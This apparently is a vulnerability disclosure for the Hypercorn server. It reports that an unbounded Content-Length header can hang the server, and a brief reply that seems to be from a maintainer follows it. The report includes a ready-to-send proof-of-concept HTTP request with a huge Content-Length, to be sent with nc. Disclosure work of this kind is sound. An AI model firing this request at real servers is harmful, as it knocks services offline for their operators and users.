Unbounded Content-Length Parsing Issue
Summary
Hypercorn does not correctly validate the Content-Length header in HTTP requests, failing to enforce a maximum allowable request body size.
Details
RFC 9110 says this:
Since there is no predefined limit to the length of content, a recipient MUST anticipate potentially large decimal numerals and prevent parsing errors due to integer conversion overflows or precision loss due to integer conversion.
This implies that the server must ensure that it does not experience overflow or precision loss when parsing this number, and needs to set the maximum allowable request body size according to itself. However, hypercorn fails to verify the value of the Content-Length and do not set the maximum request body size, resulting in the server hanging and unresponsive.
Example
POST / HTTP/1.1\r\n
Host: victim.com\r\n
Content-Length: 9999999999999999999999999999999999999999999999\r\n
\r\n
Hello,world\r\n
\r\n
Suggested action
Strictly follow RFC specifications when parsing requests, and ensure that the Content-Length header value is verified not to exceed the maximum request body size. If a mismatch is detected, the request should be rejected immediately with a 400 (Bad Request) or similar error response.
PoC
The example request is embedded in the previous section. Send the request to the server, e.g. by echo -ne into nc.
Impact
This bug enables attackers to manipulate the problem that the maximum request body size is not set, by sending HTTP requests with the Content-Length that included a large value, potentially result in a denial of service.
The version we tested was 84d06b8.
Well, I guess the underlying h11 library didn't handle that properly... Does it help if add a small read_timeout to the config?